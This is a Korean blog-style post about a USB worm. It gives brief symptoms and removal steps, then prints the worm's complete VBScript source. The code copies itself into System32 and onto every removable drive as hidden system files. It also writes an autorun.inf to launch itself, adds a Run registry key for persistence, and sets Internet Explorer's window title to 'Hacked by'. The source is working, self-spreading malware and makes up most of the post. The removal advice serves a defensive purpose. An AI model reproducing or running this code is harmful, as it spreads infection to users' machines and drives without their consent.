USB 바이러스 VB 소스 & 치료방법

소스를 좀 보니까 나름 귀엽다(-_-?)
익스프로러 창에 "Hacked by"가 뜨고 내컴퓨터에서 드라이브로 들어가면 autorun.inf로 인해 884B0E95AB804B3.vbs라는 스크립트가 실행된다.

치료방법은 먼저 explorer.exe, WScript.exe를 (작업 관리자에서) 프로세스를 강제 종료한 후, \SYSTEM32아래의 884B0E95AB804B3.vbs파일을 삭제하고, USB메모리의 884B0E95AB804B3.vbs와 autorun.inf를 삭제하면 된다.

굵은 글씨는 이 프로그램의 핵심(?)이라고 생각되는곳.



===================================
On error resume Next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Dim text,size
Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'884B0E95AB804B3.vbs 884B0E95AB804B3.vbs 884B0E95AB804B3.vbs 884B0E95AB804B3.vbs 884B0E95AB804B3.vbs884B0E95AB804B3.vbs884B0E95AB804B3.vbs884B0E95AB804B3.vbs884B0E95AB804B3.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe 884B0E95AB804B3.vbs"
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline:mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
Do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\884B0E95AB804B3.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\884B0E95AB804B3.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\884B0E95AB804B3.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End if
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")
End If
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname